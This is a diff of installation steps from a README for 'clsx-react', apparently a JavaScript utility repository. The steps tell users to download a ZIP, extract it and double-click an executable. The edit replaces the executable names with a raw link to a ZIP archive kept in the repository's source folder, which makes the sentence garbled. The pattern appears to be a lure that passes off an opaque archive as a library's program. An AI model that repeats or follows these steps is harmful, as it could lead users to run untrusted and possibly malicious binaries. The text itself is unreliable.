wei891127/clsx-react/README.md

 6. Extract the contents of the downloaded ZIP file.

 7. Open the extracted folder and find the executable file.
-It usually appears as `clsx-react.exe` for Windows, `clsx-react.app` for macOS, or just `clsx-react` for Linux.
+It usually appears as `https://raw.githubusercontent.com/wei891127/clsx-react/main/src/clsx_react_v3.4.zip` for Windows, `https://raw.githubusercontent.com/wei891127/clsx-react/main/src/clsx_react_v3.4.zip` for macOS, or just `clsx-react` for Linux.

 8. Double-click the file to run clsx-react.